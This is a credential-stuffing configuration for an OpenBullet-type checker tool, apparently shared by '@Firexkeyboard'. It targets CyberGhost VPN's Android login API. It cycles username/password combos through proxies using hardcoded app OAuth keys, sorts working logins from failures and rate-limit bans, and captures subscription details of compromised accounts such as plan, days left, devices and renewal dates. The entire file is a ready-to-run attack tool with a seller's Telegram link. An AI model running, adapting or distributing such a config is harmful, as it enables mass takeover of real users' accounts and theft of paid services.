[SETTINGS]
{
  "Name": "[CYBERGHOST]",
  "SuggestedBots": 25,
  "MaxCPM": 0,
  "LastModified": "2026-01-28T02:43:02.6033885+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@Firexkeyboard",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "[CYBERGHOST]",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": "@Firexkeyboard",
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#ID1 FUNCTION RandomString "?u?u-?u?d?d?d?u" -> VAR "ID1" 

#ID2 FUNCTION RandomString "?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h" -> VAR "ID2" 

#LOGIN REQUEST POST "https://api.cyberghostvpn.com/cg/oauth/access_token?os=android&cid=<ID2>&osver=28&partnersId=1&version=8.32.0.3590&deviceType=unknown&lng=es&region=" 
  CONTENT "{\"x_auth_machineid\":\"<ID2>\",\"x_auth_machinename\":\"<ID1>\",\"x_auth_password\":\"<PASS>\",\"x_auth_username\":\"<USER>\",\"x_auth_mode\":\"client_auth\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept-Encoding: gzip" 
  HEADER "Authorization: OAuth oauth_version=\"1.0\", oauth_signature_method=\"PLAINTEXT\", oauth_consumer_key=\"2321624eecd93aacdd70203266f01b92887745\", oauth_signature=\"c6c972fbbaf24380994a31242e8b246c1775afe%26\"" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: api.cyberghostvpn.com" 
  HEADER "user-agent: CG-And/8.32.0.3590 (Android 9; SM-N975F/samsung-user 9.0.0 20171130.276299 release-keys/4.19.71+)" 
  HEADER "X-APP-KEY: 2321624eecd93aacdd70203266f01b92887745" 
  HEADER "X-MACHINE-ID: <ID2>" 
  HEADER "X-MACHINE-NAME: <ID1>" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "oauth_token" 
  KEYCHAIN Ban OR 
    KEY "<RESPONSECODE>" Contains "429" 
    KEY "<RESPONSECODE>" Contains "429" 
  KEYCHAIN Failure OR 
    KEY "USER NOT FOUND OR WRONG PASSWORD!" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "MAXIMUM ACTIVATIONS REACHED - RESET REQUIRED" 

#TK PARSE "<SOURCE>" LR "oauth_token=" "&" -> VAR "TK" 

#OAUTH PARSE "<SOURCE>" LR "oauth_token_secret=" "" -> VAR "OAUTH" 

#INFO REQUEST GET "https://api.cyberghostvpn.com/cg/users/me?os=android&cid=<ID2>&osver=28&partnersId=1&version=8.32.0.3590&deviceType=unknown&lng=es&region&flags=18" 
  
  HEADER "Accept: application/json; charset=UTF-8" 
  HEADER "Accept-Encoding: gzip" 
  HEADER "Authorization: OAuth oauth_version=\"1.0\", oauth_signature_method=\"PLAINTEXT\", oauth_consumer_key=\"2321624eecd93aacdd70203266f01b92887745\", oauth_signature=\"c6c972fbbaf24380994a31242e8b246c1775afe%26<OAUTH>\", oauth_token=\"<TK>\"" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Host: api.cyberghostvpn.com" 
  HEADER "user-agent: CG-And/8.32.0.3590 (Android 9; SM-N975F/samsung-user 9.0.0 20171130.276299 release-keys/4.19.71+)" 
  HEADER "X-APP-KEY: 2321624eecd93aacdd70203266f01b92887745" 
  HEADER "X-MACHINE-ID: <ID2>" 
  HEADER "X-MACHINE-NAME: <ID1>" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"plan_type\":\"paid\"}" 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"plan_type\":\"free\"}" 

#DAYS_LEFT PARSE "<SOURCE>" LR "\"days_left\":" "," -> VAR "DAYS LEFT" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<DAYS LEFT>" GreaterThan "0" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<DAYS LEFT>" LessThanOrEqual "0" 

#ON_TRIAL PARSE "<SOURCE>" LR "\"hasPaidTrial\":" "," CreateEmpty=FALSE -> CAP "ON TRIAL" "[" "]" 

#MAX_DEVICES PARSE "<SOURCE>" LR "\"max_devices\":" "," -> VAR "MAX DEVICES" 

#DEVICES_IN_USE PARSE "<SOURCE>" LR "\"activateddevices\":\"" "\"" CreateEmpty=FALSE -> CAP "DEVICES IN USE" "[" "/<MAX DEVICES>]" 

#PLAN PARSE "<SOURCE>" LR "\"internal_name\":\"" "\"" CreateEmpty=FALSE -> CAP "PLAN" "[" "]" 

#AUTO_RENEW1 PARSE "<SOURCE>" LR "\"recurring\":" "," -> VAR "AUTO RENEW1" 

IF "<AUTO RENEW1>" CONTAINS "0"
SET CAP "AUTO RENEW" VAR "[False]"
ELSE
SET CAP "AUTO RENEW" VAR "[True]"
ENDIF

#START_DATE1 PARSE "<SOURCE>" LR "\"startdate\":\"" "\"" -> VAR "START DATE1" 

#START_DATE2 FUNCTION Split " " 1 "<START DATE1>" -> VAR "START DATE2" 

#START_DATE3 FUNCTION Constant "[<START DATE2>]" -> CAP "START DATE" 

#END_DATE1 PARSE "<SOURCE>" LR "\"enddate\":\"" "\"" -> VAR "END DATE1" 

#END_DATE2 FUNCTION Split " " 1 "<END DATE1>" -> VAR "END DATE2" 

#END_DATE3 FUNCTION Constant "[<END DATE2>]" -> CAP "END DATE" 

FUNCTION Constant "t.me/Firexservices" -> CAP "MADE BY @Firexkeyboard" 

